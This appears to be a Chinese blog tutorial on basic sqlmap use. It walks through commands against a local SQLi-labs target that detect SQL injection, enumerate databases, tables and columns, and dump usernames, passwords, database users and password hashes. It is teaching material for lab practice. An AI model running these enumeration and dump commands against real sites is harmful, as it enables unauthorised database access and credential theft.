sqlmap基本使用

0x01 SQLMap简介

​ SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多插件。SQLMap采用了以下5种独特的SQL注入技术。

  • 基于布尔类型的盲注

  • 基于时间的盲注

  • 基于报错注入

  • 联合查询注入

  • 堆查询注入

    kali平台自带SQLMap,启动SQLMap如下图所示:

image-20200707092205695

0x02 SQLMap基础

1.判断是否存在注入

目标注入点为http://192.168.1.152:10000/control/sqlinject/manifest_error.php?id=1,判断其是否存在注入的命令如下:

root@kali-Y:~# sqlmap -u  http://192.168.1.152:10000/control/sqlinject/manifest_error.php?id=1

结果显示存在注入,如下图所示。

2.查询当前用户下的所有数据库

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --dbs

image-20200707095643339

3.获取数据库中的表名

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security --tables 

-D 参数来指定具体的数据库,若未加-D参数,则会列出数据库中所有库的表。

image-20200707100330133

4.获取表中的字段名

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security -T users --columns

# -D 指定数据库
# -T 指定表名

image-20200707100736174

5.获取字段内容

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 -D security -T users -C id,password,username --dump

# -D 指定数据库
# -T 指定表名
# -C 指定字段

image-20200707101227167

6.获取数据库的所有用户

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --users

# 在当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有的管理用户

image-20200707101723208

7.获取数据库用户的密码

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --passwords

image-20200707115756580

这里没有发现…

8.获取当前网站数据库的名称

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --current-db

image-20200707111027502

9.获取当前网站数据库的用户名称

root@kali-Y:~# sqlmap -u http://192.168.1.152:40000/Less-1/?id=1 --current-user

image-20200707111056516

参考:Web安全攻防-渗透测试实战指南

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值